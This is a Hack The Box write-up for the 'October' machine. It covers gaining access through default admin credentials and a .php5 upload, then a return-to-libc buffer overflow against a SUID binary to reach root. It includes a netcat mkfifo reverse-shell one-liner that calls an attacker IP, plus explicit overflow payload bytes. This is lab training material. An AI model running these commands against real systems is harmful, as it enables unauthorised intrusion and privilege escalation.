October — HTB Walkthrough
Buffer Overflow — — but not using Shellcode. Great box, learnt a lot about ASLR , NX bytes and return-to-libc trick to bypasss code and gain shell. LET’S BEGIN.
Port 80 HTTP Enumeration
Registering with Username: n00bDi password:abcdabcd . Cannot find much on website. So decided to run a dirbuster scan
Traversing to backend
Signing in as admin:admin worked. If you don’t get it how, you can run Hydra too. It was a guess word with usual creds. We get admin dashboard
Uploading php using media. Capture request on burp and change php to php5 as hinted by dr.ph5
Uploading the file with changes told above.
We see a public URL is given aside on this page to traverse to abcd.php5, keep msf exploit/multi/handler on, if you have used above payload to get reverse shell. Else , you can also use this as payload in abcd.php5
Keep netcat on at port 1234 , and in URL you can abuse cmd as follows
Using pentest monkey reverse shell using netcat, send URL encoded input to CMD =
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.16 1234 >/tmp/f
And on netcat we see
Looking for SUID
We see here a file named ovrflw. Lets see what code it contains
Okh this might be vulnerable to Buffer Overflow. And why not it uses strcpy, also its name suggests so. Doing ltrace to see what and how input goes
Let’s copy this to our machine, using nc.
Running file on gdb and disassembling main function
2) Finding offset
We see it lies between 110 to 120. So keeping length = 120 we will create a pattern using metasploit-framework
Now send this instead of A’s
This we will pass as argument to pattern_offset script to determine exact offset
3) Overwriting the EIP
Checking EIP address
So now we will set a breakpoint at 0xfff4adbc and check if it hits
Using msfvenom we will create a shellcode
5) Sending payload
Using some padding we will send our shellcode and offset as a payload. For this we write shell.py
Here we are sending EIP = “A”s so that we can detect it easily on machine. Now take this script to target machine, using python server , in /tmp of target machine. Then on target machine in /usr/local/bin
Now we will analyze EIP register to get address
We see our shellcode starts at 0xbfd4397d , so we will change EIP to somewhere in mid of \x90s == 0xbfd43970
It was continuously giving segmentation fault. Something was wrong so I checked it on target machine
also checking permission on file, as if why we cannot run the shellcode
NX enabled ; no execution : means I cannot run shellcode here. Then what.
Its an exploit mitigation technique which makes certain areas of memory non executable and makes an executable area, non writable. Example: Data, stack and heap segments are made non executable while text segment is made non writable.
With NX bit turned on, our classic approach to stack based buffer overflow will fail to exploit the vulnerability. Since in classic approach, shellcode was copied into the stack and return address was pointing to shellcode. But now since stack is no more executable, our exploit fails!! But this mitigation technique is not completely foolproof, hence in this post lets see how to bypass NX Bit!!
NX bit can be bypassed using an attack technique called “return-to-libc”. Here return address is overwritten with a particular libc function address (instead of stack address containing the shellcode). For example if an attacker wants to spawn a shell, he overwrites return address with system() address and also sets up the appropriate arguments required by system() in the stack, for its successful invocation.
Return to libc: is a method of exploiting a buffer overflow on a system that has a non-executable stack, it is very similar to a standard buffer overflow, in that the return address is changed to point at a new location that we can control
Now to check memory address of libc we can do following
Checking memory address of libc, /bin/sh, system and exit outside gdb.
/bin/sh : 0xb7582000+0x162bac =0xB76E4BAC
Format : Offset*NOP bytes + System + Exit + /bin/sh
payload : $(python -c ‘print(“\x90”*112 + “\x10\x23\x5c\xb7” + “\x60\x52\x5b\xb7” + “\xac\x4b\x6e\xb7”)’);
We could have directly executed
/usr/local/bin/ovrflw $(python -c ‘print(“\x90”*112 + “\x10\x23\x5c\xb7” + “\x60\x52\x5b\xb7” + “\xac\x4b\x6e\xb7”)’);
But we get core dumped because ASLR is enabled. So we need to loop over
Address Space Layout Randomization (ASLR) is primarily used to protect against buffer overflow attacks. In a buffer overflow, attackers feed a function as much junk data as it can handle, followed by a malicious payload. The payload will overwrite data the program intends to access
How ASLR works? ASLR increases the control-flow integrity of a system by making it more difficult for an attacker to execute a successful buffer-overflow attack by randomizing the offsets it uses in memory layouts
Now we have priv to read content of root
Yeayyyy we are root. ROOTED !!!